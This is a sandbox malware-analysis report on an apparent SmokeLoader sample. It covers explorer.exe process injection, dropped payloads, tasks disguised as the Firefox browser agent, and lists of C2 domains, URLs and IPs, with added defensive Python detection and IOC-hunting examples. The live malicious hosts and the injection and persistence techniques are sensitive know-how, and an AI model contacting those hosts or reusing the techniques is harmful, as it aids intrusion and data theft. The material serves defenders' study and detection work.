                Source: C:\Users\user\AppData\Roaming\teihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\teihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\teihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\teihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\jtihrdr | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: explorer.exe, 00000002.00000000.2117520467.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman

                Note on reading these lines: the paired "Section loaded" entries (a section mapped into explorer.exe first read/write, then execute/read) followed by "Thread created ... EIP" is the section-mapping injection pattern: the payload is written into a shared section mapped into explorer.exe and a remote thread is started at the mapped code. Every network connection and dropped file that follows is attributed to explorer.exe, which is why the sample-level signatures read "System process connects to network" and "Benign windows process drops PE files".
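The chain above (user-writable binary creates a thread in explorer.exe, explorer.exe then connects out and drops executables under AppData) can be expressed as endpoint detection rules. The following is an added example written for this page, not Joe Sandbox output and not code from the sample; it evaluates Sysmon-style events (Event ID 8 CreateRemoteThread, 3 NetworkConnect, 11 FileCreate), and the events in `SAMPLE_EVENTS` are constructed to mirror the report's paths and addresses. Note that Sysmon has no event for the NtMapViewOfSection step itself, so the thread creation and the side effects are what the rules key on.

```python
"""Detection rules for the explorer.exe injection chain seen in this report.

Added example: not sandbox output and not SmokeLoader code. The rules run over
Sysmon-style events (8 = CreateRemoteThread, 3 = NetworkConnect, 11 = FileCreate).
"""
import ipaddress
import re

EXPLORER = r"c:\windows\explorer.exe"
# Locations a standard user can write to; legitimate callers of explorer.exe live elsewhere.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|desktop|downloads)\\", re.I)


def is_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.match(path))


def is_public_ip(ip: str) -> bool:
    """True for routable addresses; explorer.exe talking to RFC1918 file shares is normal."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def looks_like_dropped_payload(path: str) -> bool:
    """Extension-less or .exe files under AppData, as with teihrdr, jtihrdr and B9A0.exe."""
    name = path.rsplit("\\", 1)[-1]
    under_appdata = "\\appdata\\" in path.lower()
    return under_appdata and ("." not in name or name.lower().endswith(".exe"))


def evaluate(events):
    """Return (rule_id, detail) for every event that matches one of the three rules."""
    hits = []
    for e in events:
        eid = e["EventID"]
        if eid == 8 and e["TargetImage"].lower() == EXPLORER and is_user_writable(e["SourceImage"]):
            hits.append(("remote_thread_into_explorer",
                         f'{e["SourceImage"]} -> {e["TargetImage"]} start {e["StartAddress"]}'))
        elif eid == 3 and e["Image"].lower() == EXPLORER and is_public_ip(e["DestinationIp"]):
            hits.append(("explorer_outbound_connection",
                         f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
        elif eid == 11 and e["Image"].lower() == EXPLORER and looks_like_dropped_payload(e["TargetFilename"]):
            hits.append(("explorer_drops_payload", e["TargetFilename"]))
    return hits


# Constructed events (not sandbox output); paths, IPs and the start address mirror the report.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\user\Desktop\BzLGqYKy7o.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x087C19A8"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",          # benign: csrss does this
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x77A1B2C0"},
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "188.40.141.211", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe",                       # benign: SMB to a LAN share
     "DestinationIp": "192.168.1.10", "DestinationPort": 445},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "142.250.74.110", "DestinationPort": 443},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\teihrdr"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",                      # benign: recent-items shortcut
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\report.lnk"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\B9A0.exe"},
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Against the constructed events the rules fire four times (one remote thread, one outbound connection, two dropped files) and stay quiet on the three benign records. The outbound rule is the noisiest of the three in production, because explorer.exe does reach the Internet for shell extensions and WebDAV; correlating it with a preceding Event ID 8 against the same explorer.exe PID is what turns it into a high-confidence alert.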

                Stealing of Sensitive Information

                Source: Yara match | File source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix

                Techniques with at least one mapped signature, grouped by tactic (number of matching signatures in parentheses; the matrix's unmapped filler cells are omitted):

                Execution: Exploitation for Client Execution (1)
                Persistence: DLL Side-Loading (1)
                Privilege Escalation: Process Injection (32), DLL Side-Loading (1)
                Defense Evasion: Masquerading (11), Virtualization/Sandbox Evasion (12), Process Injection (32), Hidden Files and Directories (1), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1), File Deletion (1)
                Discovery: Security Software Discovery (511), Virtualization/Sandbox Evasion (12), Process Discovery (3), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (12)
                Command and Control: Encrypted Channel (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (4), Application Layer Protocol (115)

                No signatures were mapped to Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Collection, Exfiltration or Impact.
                Behavior Graph (ID: 1528058, Sample: BzLGqYKy7o.exe, Start date: 07/10/2024, Architecture: WINDOWS, Score: 100)

                Contacted domains: nwgrus.ru, calvinandhalls.com, bestworldhools.com
                Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

                BzLGqYKy7o.exe (node 8, started): Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Switches to a custom stack to bypass stack traces; injects into explorer.exe (node 17)
                teihrdr (node 11, started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                jtihrdr (node 13, started): Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
                teihrdr (node 15, started)
                explorer.exe (node 17, injected; graph counters 76 and 6):
                    Network: 23.145.40.164 (ports 443, 49932; SURFAIRWIRELESS-IN-01US, Reserved); nwgrus.ru / 105.197.97.247 (ports 49770, 49776, 49782; RAYA-ASEG, Egypt); 2 other IPs or domains
                    Dropped: C:\Users\user\AppData\Roaming\teihrdr (PE32); C:\Users\user\AppData\Roaming\jtihrdr (PE32); C:\Users\user\AppData\Local\Temp\B9A0.exe (PE32); C:\Users\user\...\teihrdr:Zone.Identifier (ASCII)
                    Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Starts: B9A0.exe (node 22)
                B9A0.exe (node 22, started): Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 5 other signatures

                Source | Detection | Scanner | Label
                BzLGqYKy7o.exe | 32% | ReversingLabs |
                BzLGqYKy7o.exe | 100% | Avira | HEUR/AGEN.1310247
                BzLGqYKy7o.exe | 100% | Joe Sandbox ML |

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\teihrdr | 100% | Avira | HEUR/AGEN.1310247
                C:\Users\user\AppData\Local\Temp\B9A0.exe | 100% | Avira | HEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\jtihrdr | 100% | Avira | HEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\teihrdr | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Local\Temp\B9A0.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\jtihrdr | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\teihrdr | 32% | ReversingLabs |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
                https://powerpoint.office.comcember | 0% | URL Reputation | safe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
                https://api.msn.com/ | 0% | URL Reputation | safe
                https://excel.office.com | 0% | URL Reputation | safe
                http://schemas.micro | 0% | URL Reputation | safe
                http://crl.v | 0% | URL Reputation | safe
                https://outlook.com | 0% | URL Reputation | safe
                                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                        calvinandhalls.com | 188.40.141.211 | true | true | | unknown
                                        nwgrus.ru | 105.197.97.247 | true | true | | unknown
                                        bestworldhools.com | 188.40.141.211 | true | true | | unknown

                                        Name | Malicious | Antivirus Detection | Reputation
                                        https://calvinandhalls.com/search.php | true | | unknown
                                        http://tech-servers.in.net/tmp/index.php | true | | unknown
                                        https://23.145.40.164/ksa9104.exe | true | | unknown
                                        https://bestworldhools.com/search.php | true | | unknown
                                        http://unicea.ws/tmp/index.php | true | | unknown
                                        http://nwgrus.ru/tmp/index.php | true | | unknown
                                        Name | Source | Malicious | Antivirus Detection | Reputation
                                        https://word.office.comon | explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                                        http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.2121740943.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121740943.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                                        https://android.notify.windows.com/iOS | explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://powerpoint.office.comcember | explorer.exe, 00000002.00000000.2121214816.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000002.00000000.2121214816.000000000C549000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://api.msn.com/ | explorer.exe, 00000002.00000000.2119469337.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://excel.office.com | explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        http://schemas.micro | explorer.exe, 00000002.00000000.2118897600.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118355378.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118873758.0000000008870000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        http://crl.v | explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://outlook.com | explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                        https://wns.windows.com/)s | explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        188.40.141.211 | calvinandhalls.com | Germany | 24940 | HETZNER-ASDE | true
                                        105.197.97.247 | nwgrus.ru | Egypt | 24835 | RAYA-ASEG | true
                                        189.195.132.134 | unknown | Mexico | 13999 | MegaCableSAdeCVMX | true
                                        23.145.40.164 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
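The domain, URL and IP tables above are the network indicators worth pushing to a proxy or DNS log search. The following added example (written for this page, not Joe Sandbox output) loads them, defangs them for reporting, and matches constructed proxy log lines written in Squid's native access-log format. HTTPS traffic is modelled as `CONNECT host:port` with no TLS interception, so for the `search.php` and `ksa9104.exe` URLs only the host is visible; the IOC set therefore carries both full (host, path) pairs and bare hosts and IPs.

```python
"""Network IOC matching for the C2 infrastructure listed in this report.

Added example, not sandbox output. Indicators come from the report's URL and IP
tables; the proxy log lines are constructed in Squid native format:
  time elapsed client code/status bytes method url user hier/peer type
"""
from urllib.parse import urlsplit

C2_URLS = [
    "https://calvinandhalls.com/search.php",
    "https://bestworldhools.com/search.php",
    "http://nwgrus.ru/tmp/index.php",
    "http://tech-servers.in.net/tmp/index.php",
    "http://unicea.ws/tmp/index.php",
    "https://23.145.40.164/ksa9104.exe",
]
C2_IPS = {"188.40.141.211", "105.197.97.247", "189.195.132.134", "23.145.40.164"}


def ioc_set(urls):
    """Split the URL list into a bare-host set and a (host, path) set."""
    pairs = {(urlsplit(u).hostname.lower(), urlsplit(u).path) for u in urls}
    return {h for h, _ in pairs}, pairs


def defang(indicator: str) -> str:
    """Render an indicator safe to paste into tickets or chat."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def parse_squid_line(line: str) -> dict:
    f = line.split()
    return {"client": f[2], "method": f[5], "url": f[6], "peer": f[8].split("/", 1)[-1]}


def request_host_path(rec: dict):
    """Host and path of a request; a CONNECT tunnel exposes only 'host:port'."""
    if rec["method"] == "CONNECT":
        return rec["url"].rsplit(":", 1)[0].lower(), ""
    p = urlsplit(rec["url"])
    return (p.hostname or "").lower(), p.path


def match_proxy_log(lines):
    """Return (client, match_kind, request) for every line that touches the C2 set.

    match_kind is 'url' for an exact host+path hit and 'host' when only the host,
    the destination IP, or the upstream peer address is on the list.
    """
    hosts, pairs = ioc_set(C2_URLS)
    hits = []
    for line in lines:
        rec = parse_squid_line(line)
        host, path = request_host_path(rec)
        if (host, path) in pairs:
            hits.append((rec["client"], "url", rec["url"]))
        elif host in hosts or host in C2_IPS or rec["peer"] in C2_IPS:
            hits.append((rec["client"], "host", rec["url"]))
    return hits


# Constructed log lines (not from the sandbox). 10.0.0.5 plays the infected host.
SAMPLE_PROXY_LOG = [
    "1728306010.123 312 10.0.0.5 TCP_MISS/200 512 POST http://nwgrus.ru/tmp/index.php - HIER_DIRECT/105.197.97.247 text/html",
    "1728306011.456 90 10.0.0.5 TCP_TUNNEL/200 4096 CONNECT calvinandhalls.com:443 - HIER_DIRECT/188.40.141.211 -",
    "1728306012.789 45 10.0.0.7 TCP_MISS/200 2048 GET http://www.autoitscript.com/autoit3/ - HIER_DIRECT/203.0.113.10 text/html",
    "1728306013.000 200 10.0.0.5 TCP_TUNNEL/200 300000 CONNECT 23.145.40.164:443 - HIER_DIRECT/23.145.40.164 -",
    "1728306014.111 30 10.0.0.9 TCP_MISS/200 700 GET http://nwgrus.ru/favicon.ico - HIER_DIRECT/105.197.97.247 image/x-icon",
]

if __name__ == "__main__":
    for client, kind, request in match_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} {kind:4s} {defang(request)}")
```

Two caveats when running this for real: 188.40.141.211 sits in Hetzner shared hosting, so an IP-only or peer-only hit needs the hostname before it is actionable, and the `/tmp/index.php` path is a loader convention rather than a fixed string, so hits on the bare hosts (the `favicon.ico` line above) should be kept rather than filtered out as path mismatches.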
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528058
                                        Start date and time:2024-10-07 14:58:03 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:BzLGqYKy7o.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:d0d4805488e7e745515fff2165d3cc05.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@6/4@7/4
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 73
                                        • Number of non-executed functions: 9
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: BzLGqYKy7o.exe
                                        Time | Type | Description
                                        08:59:11 | API Interceptor | 329327x Sleep call for process: explorer.exe modified
                                        14:59:20 | Task Scheduler | Run new task: Firefox Default Browser Agent E99ED912E432380B path: C:\Users\user\AppData\Roaming\teihrdr
                                        15:00:11 | Task Scheduler | Run new task: Firefox Default Browser Agent 934EE7DA49EF2551 path: C:\Users\user\AppData\Roaming\jtihrdr
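The two scheduled tasks above reuse the naming scheme of Firefox's own "Firefox Default Browser Agent <16 hex digits>" task but point at extension-less files in AppData\Roaming. The following added example (written for this page, not Joe Sandbox output) hunts for that pattern in the CSV produced by `schtasks /query /fo CSV /v`; the CSV embedded in `SAMPLE_SCHTASKS_CSV` is constructed with a subset of the real columns and contains the two tasks from this report next to Mozilla's genuine task and one built-in Windows task. The Program Files locations assumed for the genuine agent are the default install paths.

```python
"""Hunt for scheduled tasks that imitate Firefox's Default Browser Agent task.

Added example, not sandbox output. Reads `schtasks /query /fo CSV /v` output and
flags (a) tasks carrying the Firefox agent name that do not run Mozilla's binary,
(b) task actions that run from the user profile, and (c) actions with no extension.
"""
import csv
import io
import re

FIREFOX_AGENT_NAME = re.compile(r"Firefox Default Browser Agent [0-9A-F]{16}$", re.I)
# Default install locations of the genuine agent (assumption: standard Firefox install).
FIREFOX_AGENT_EXE = re.compile(
    r"^[a-z]:\\program files( \(x86\))?\\mozilla firefox\\default-browser-agent\.exe$", re.I)
USER_PROFILE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\|%(?:appdata|localappdata|temp|userprofile)%)", re.I)


def action_exe(task_to_run: str) -> str:
    """First token of the 'Task To Run' column, honouring a double-quoted path."""
    s = task_to_run.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def hunt(schtasks_csv: str) -> dict:
    """Map each suspicious task name to the list of reasons it was flagged."""
    findings = {}
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        name = row["TaskName"]
        exe = action_exe(row["Task To Run"])
        reasons = []
        if FIREFOX_AGENT_NAME.search(name) and not FIREFOX_AGENT_EXE.match(exe):
            reasons.append("imitates the Firefox agent task name but does not run default-browser-agent.exe")
        if USER_PROFILE.match(exe):
            reasons.append("action runs from the user profile")
        if "." not in exe.rsplit("\\", 1)[-1]:
            reasons.append("action binary has no file extension")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed schtasks output with a subset of the real columns (not sandbox output).
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"WS01","\Firefox Default Browser Agent E99ED912E432380B","Ready","WS01\user","C:\Users\user\AppData\Roaming\teihrdr","user"
"WS01","\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB","Ready","Mozilla","""C:\Program Files\Mozilla Firefox\default-browser-agent.exe"" do-task ""308046B0AF4A39CB""","user"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS01","\Firefox Default Browser Agent 934EE7DA49EF2551","Ready","WS01\user","C:\Users\user\AppData\Roaming\jtihrdr","user"
'''

if __name__ == "__main__":
    for task, reasons in hunt(SAMPLE_SCHTASKS_CSV).items():
        print(task)
        for r in reasons:
            print("  -", r)
```

Only the two report tasks are returned, each with all three reasons. Rules (b) and (c) are deliberately independent of the Firefox name, so a variant that picks a different lure name but keeps the extension-less AppData\Roaming payload is still caught; the genuine task is distinguishable by living under the \Mozilla\ folder and running default-browser-agent.exe from Program Files.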
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        188.40.141.211 | w4DO1Z18yg.wsf | malicious | SmokeLoader | ceoconstractionstore.pl/index.php
                                        188.40.141.211 | UkHkCa3IYV.wsf | malicious | SmokeLoader | ceoconstractionstore.pl/index.php
                                        188.40.141.211 | 3312.PDF.wsf | malicious | SmokeLoader | ceoconstractionstore.pl/index.php
                                        188.40.141.211 | RmbF3635xY.exe | malicious | SmokeLoader | ceoconstractionstore.pl/index.php
                                        188.40.141.211 | abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | malicious | CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger | gmpeople.com/upload/
                                        188.40.141.211 | vwaoMjcyAw.exe | malicious | SmokeLoader | selebration17io.io/index.php
                                        188.40.141.211 | Qi4Mj8hG3t.exe | malicious | SmokeLoader | selebration17io.io/index.php
                                        188.40.141.211 | br0A8E2X6I.exe | malicious | SmokeLoader | selebration17io.io/index.php
                                        188.40.141.211 | setup.exe | malicious | Babuk, Djvu | zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                                        188.40.141.211 | SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | malicious | SmokeLoader | agressivemnaiq.xyz/
                                        105.197.97.247 | msvR1bl94M.exe | malicious | SmokeLoader | 100xmargin.com/tmp/index.php
                                        105.197.97.247 | j1NeIT4ojp.exe | malicious | SmokeLoader | epohe.ru/tmp/
                                        105.197.97.247 | UICbFTrVH4.exe | malicious | SmokeLoader | 100xmargin.com/tmp/index.php
                                        189.195.132.134 | XVM5nluelx.exe | malicious | Babuk, Djvu, SmokeLoader | sdfjhuz.com/dl/buildz.exe
                                        189.195.132.134 | AaIo4VGgvO.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | cajgtus.com/files/1/build3.exe
                                        189.195.132.134 | SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar | sajdfue.com/files/1/build3.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
bestworldhools.com | UV2uLdRZix.exe | malicious | SmokeLoader | 188.40.141.211
| LKpIHL2abO.exe | malicious | SmokeLoader | 188.40.141.211
| wu5C20dPdy.exe | malicious | SmokeLoader | 188.40.141.211
calvinandhalls.com | UV2uLdRZix.exe | malicious | SmokeLoader | 188.40.141.211
| LKpIHL2abO.exe | malicious | SmokeLoader | 188.40.141.211
| wu5C20dPdy.exe | malicious | SmokeLoader | 188.40.141.211
| c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.162
| 9VgIkx4su0.exe | malicious | SmokeLoader | 23.145.40.162
| veEGy9FijY.exe | malicious | SmokeLoader | 23.145.40.162
| v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.162
| 0k3ibTiMjy.exe | malicious | SmokeLoader | 23.145.40.162
| qg5Ddf4an9.exe | malicious | SmokeLoader | 23.145.40.162
nwgrus.ru | UV2uLdRZix.exe | malicious | SmokeLoader | 185.12.79.25
| LKpIHL2abO.exe | malicious | SmokeLoader | 197.164.156.210
| wu5C20dPdy.exe | malicious | SmokeLoader | 190.147.128.172
| HaPJ2rPP6w.exe | malicious | SmokeLoader | 177.129.90.106
| c7v62g0YpB.exe | malicious | SmokeLoader | 190.147.2.86
| 9VgIkx4su0.exe | malicious | SmokeLoader | 190.224.203.37
